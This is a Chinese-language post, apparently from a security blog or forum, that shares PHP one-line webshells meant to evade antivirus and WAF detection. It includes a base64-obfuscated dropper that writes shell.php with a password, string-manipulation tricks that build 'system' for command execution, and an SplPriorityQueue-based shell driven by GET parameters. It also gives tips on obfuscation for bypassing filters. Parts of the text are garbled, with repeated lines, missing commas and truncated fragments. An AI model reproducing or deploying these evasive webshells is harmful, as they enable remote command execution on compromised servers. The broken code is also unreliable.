木马行业:0X00普通的一句话木马 适用于CTF和小站
木马行业:0X00普通的一句话木马 适用于CTF和小站另外在附上小马一个,希望大家一起集思广益!<?php $file="shell.php"; $shell="PD9waHAKJGEgPSBzdWJzdHJfcmVwbGFjZSgieHhzZXIiLCJhc3NlciIsLTMpOwokYiA9IGFycmF5KCcnLCRhKTsKJGMgPSAkYlsxXS5jaHIoJzExNicpOwokZnVuPXByZWdfcmVwbGFjZSgiL3h4LyIsIiIsJGMpOwokZCA9IHN1YnN0cl9yZXBsYWNlKCIiLCRmdW4sMCk7CiRkICgkX1BPU1RbJzExMCddKTsKPz4="; file_put_contents($file base64_decode($shell)); ?> //连接密码110<?php $a = $_GET['
2、十六进制字符串PHP版本:只限于5.3和5.5版本;在php7中不认为是数字,php5则依旧为数字。(友情提示: 5.X可以成功执行命令,php7无法执行)
<?php $s=substr("aabbccsystem" "0x6"); $s(whoami) ?>
小提示:对于我们可以结合垃圾数据,变形混淆,以及大量特殊字符和注释的方式来构造更多的payload 毕竟每家的waf规则不同,配置也不同,与一些传输层面的bypass进行结合产生的可能性就会非常多样。
3、利用在语法不换行来执行命令PHP版本:只限于7.3.4版本,如果是其他的版本就会报错,所以针对性较强!
<?php
$a = $_GET['function'] ?? 'whoami';
$b = $_GET['cmd'] ?? 'whoami';
$a(null.(null.$b));
?>
小提示:7.0版本的??特性,如果版本为5.x的话就会报错,可以结合一些其他的方式吧!
0X04PHP一句话免杀实例我这边就送个大家一些免杀把!
<?php
$file="shell.php";
$shell="PD9waHAKJGEgPSBzdWJzdHJfcmVwbGFjZSgieHhzZXIiLCJhc3NlciIsLTMpOwokYiA9IGFycmF5KCcnLCRhKTsKJGMgPSAkYlsxXS5jaHIoJzExNicpOwokZnVuPXByZWdfcmVwbGFjZSgiL3h4LyIsIiIsJGMpOwokZCA9IHN1YnN0cl9yZXBsYWNlKCIiLCRmdW4sMCk7CiRkICgkX1BPU1RbJzExMCddKTsKPz4=";
file_put_contents($file base64_decode($shell));
?>
//连接密码110
另外在附上小马一个,希望大家一起集思广益!
<?php
ini_set("display_errors" 1);
$objPQ = new SplPriorityQueue();
$objPQ->insert('m' 1);
$objPQ->insert('s' 6);
$objPQ->insert('e' 3);
$objPQ->insert('s' 4);
$objPQ->insert('y' 5);
$objPQ->insert('t' $_GET[a]);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
//Go to TOP
$objPQ->top();
$m='';
$cur = new ErrorException($_GET[b]);
while($objPQ->valid()){
$m.=$objPQ->current();
$objPQ->next();
}
echo $m($cur->getMessage());
?>
//密钥3
这篇文章的目的是想让大家对一句话木马免杀有一定的了解,在免杀对抗越来越激烈的情况下,我们不得不发散自己的思维。这次就由我来抛砖引玉,大家有什么想法,可以评论区交流!